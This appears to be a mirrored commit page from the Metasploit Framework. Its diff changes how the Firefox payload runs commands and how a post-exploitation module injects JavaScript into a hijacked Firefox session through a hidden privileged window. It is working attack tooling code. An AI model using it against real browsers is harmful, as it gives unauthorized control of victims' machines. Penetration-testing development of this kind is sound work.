1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Use shell primitives instead of resorting to

echo hacks.
This commit is contained in:
Joe Vennix 2014-01-04 19:00:36 -06:00
parent 4329e5a21e
commit f2f68a61aa
2 changed files with 16 additions and 17 deletions

View File

@ -47,7 +47,7 @@ module Msf::Payload::Firefox
# redirects stdout. A JScript "launch" file is dropped and invoked with wscript
# to run the command without displaying the cmd.exe prompt.
#
# When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the
# When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
# javascript code between the tags is eval'd and returned.
#
# @return [String] javascript source code that exposes the runCmd(str) method.
@ -59,18 +59,12 @@ module Msf::Payload::Firefox
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
var runCmd = function(cmd, cb) {
var echo = function(str) {
if(!str \|\| !str.length) return '';
var e = str.match(/echo ['"]?([^;\\s"']+)/);
return (e && e[1]) \|\| '';
}
var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());
if (cmd.trim().length == 0) return;
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
if (js) {
var wcmd = (windows) ? cmd+"\\n" : '';
var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});
Function('cb', js[1])(function(r) {
cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))
})
var tag = "[!JAVASCRIPT]";
Function('send', js[1])(function(r){ if (r) cb(r+tag+"\\n"); });
return;
}

View File

@ -35,7 +35,8 @@ class Metasploit3 < Msf::Post
end
def run
results = cmd_exec(",JAVASCRIPT,#{js_payload},ENDSCRIPT,", nil, datastore['TIMEOUT'])
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
if results.present?
print_good results
@ -48,15 +49,15 @@ class Metasploit3 < Msf::Post
js = datastore['SCRIPT'].strip
%Q|
(function(){
(function(send){
var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
.getService(Components.interfaces.nsIAppShellService)
.hiddenDOMWindow;
hiddenWindow.location = 'about:blank';
var src = (#{JSON.unparse({ :src => js })}).src;
var XHR = hiddenWindow.XMLHttpRequest;
var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
hiddenWindow[key] = true;
hiddenWindow.location = "#{datastore['URL']}";
@ -65,7 +66,11 @@ class Metasploit3 < Msf::Post
schedule(evt);
} else {
schedule(function(){
cb(hiddenWindow.Function(src)());
try {
send(hiddenWindow.Function('send', src)(send));
} catch (e) {
send("Error: "+e.message);
}
}, 500);
}
};
@ -77,7 +82,7 @@ class Metasploit3 < Msf::Post
};
schedule(evt);
})();
})(send);
|.strip
end